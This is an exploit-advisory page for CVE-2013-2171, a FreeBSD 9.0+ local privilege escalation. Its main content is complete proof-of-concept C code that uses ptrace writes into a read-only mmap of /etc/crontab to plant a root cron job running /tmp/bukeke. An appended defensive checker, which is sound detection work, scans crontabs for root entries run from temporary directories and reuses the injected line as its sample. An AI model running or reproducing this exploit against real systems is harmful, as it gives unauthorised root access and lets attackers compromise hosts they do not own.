FreeBSD 9.0+ Privilege Escalation Exploit

2013.06.24
Credit: SynQ
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/*
 * CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap
 *
 * poc by SynQ, rdot.org, 6/2013
 *
 * don't forget to cp /etc/crontab /tmp
 *
 */

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <sys/types.h>

char sc[]="*\t*\t*\t*\t*\troot\t/tmp/bukeke\n#";

void child() {
    int status;

    status = ptrace(PT_TRACE_ME, 0, 0, 0);
    if (status != 0)
        printf("child ptrace error\n");
    exit(1);
}

int main() {
    int pid, fd, i;
    char *addr;

    fd = open("/etc/crontab", O_RDONLY);
    if (fd<0) {
        printf("open failed\n");
        exit(1);
    }

    addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0);
    if (addr == MAP_FAILED) {
        printf("mmap fault\n");
        exit(1);
    }

    pid = fork();
    if (pid == -1) {
        printf("fork failed\n");
        exit(1);
    }
    else if (pid == 0)
        child();

    ptrace(PT_ATTACH, pid, 0, 0);
    if (wait(0) == -1) {
        printf("wait failed\n");
        exit(1);
    }

    printf("writing shellcode...\n");
    for(i=0; i < sizeof(sc)/4; i++)
        ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]);

    ptrace(PT_DETACH, pid, 0, 0);
    if (wait(0) == -1) {
        printf("wait2 failed\n");
        exit(1);
    }

    printf("done.\n");
    return 0;
}
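A defensive counterpart to the PoC above, added here as an example (it is not part of the original advisory or of SynQ's code): a checker that flags system-crontab entries running as root from a world-writable directory, which is the artifact this PoC leaves at the top of /etc/crontab. The function names, the /tmp and /var/tmp directory list, and the sample crontab are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample: line 1 is the crontab entry from the PoC's sc[] string. */
static const char SAMPLE[] =
    "*\t*\t*\t*\t*\troot\t/tmp/bukeke\n"
    "#/etc/crontab - root's crontab for FreeBSD\n"
    "*/5\t*\t*\t*\t*\troot\t/usr/libexec/atrun\n"
    "@reboot\troot\t/var/tmp/x.sh\n"
    "0\t*\t*\t*\t*\toperator\t/tmp/job\n";

/* Point *tok at the n-th (1-based) field of one line; return its length or 0. */
static size_t nth_field(const char *line, int n, const char **tok) {
    size_t len = 0;
    while (n-- > 0) {
        line += len + strspn(line + len, " \t");
        if ((len = strcspn(line, " \t\n")) == 0)
            return 0;               /* line has fewer than n fields */
    }
    *tok = line;
    return len;
}

/* 1 if the line runs a command as root from /tmp or /var/tmp (assumed list). */
int crontab_line_suspicious(const char *line) {
    const char *user = "", *cmd = "";
    line += strspn(line, " \t");
    if (*line == '#' || *line == '\n' || *line == '\0')
        return 0;                   /* comment or blank line */
    int base = (*line == '@') ? 1 : 5;  /* "@reboot" has one time field, not five */
    if (nth_field(line, base + 1, &user) != 4 || strncmp(user, "root", 4) != 0 ||
        nth_field(line, base + 2, &cmd) == 0)
        return 0;
    return strncmp(cmd, "/tmp/", 5) == 0 || strncmp(cmd, "/var/tmp/", 9) == 0;
}

/* Count suspicious lines in a whole crontab held in memory. */
int count_suspicious(const char *text) {
    int hits = 0;
    for (; *text != '\0'; text += (*text == '\n')) {
        hits += crontab_line_suspicious(text);
        text += strcspn(text, "\n");    /* advance to end of this line */
    }
    return hits;
}

int main(void) {
    printf("%d suspicious root entries\n", count_suspicious(SAMPLE));
    return 0;
}
```

Because the PoC's string ends in `#`, whatever remained of the original first line becomes a comment, so the injected entry sits on line 1 of the file and parses as a normal cron entry.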

References:

http://cxsecurity.com/issue/WLB-2013060170

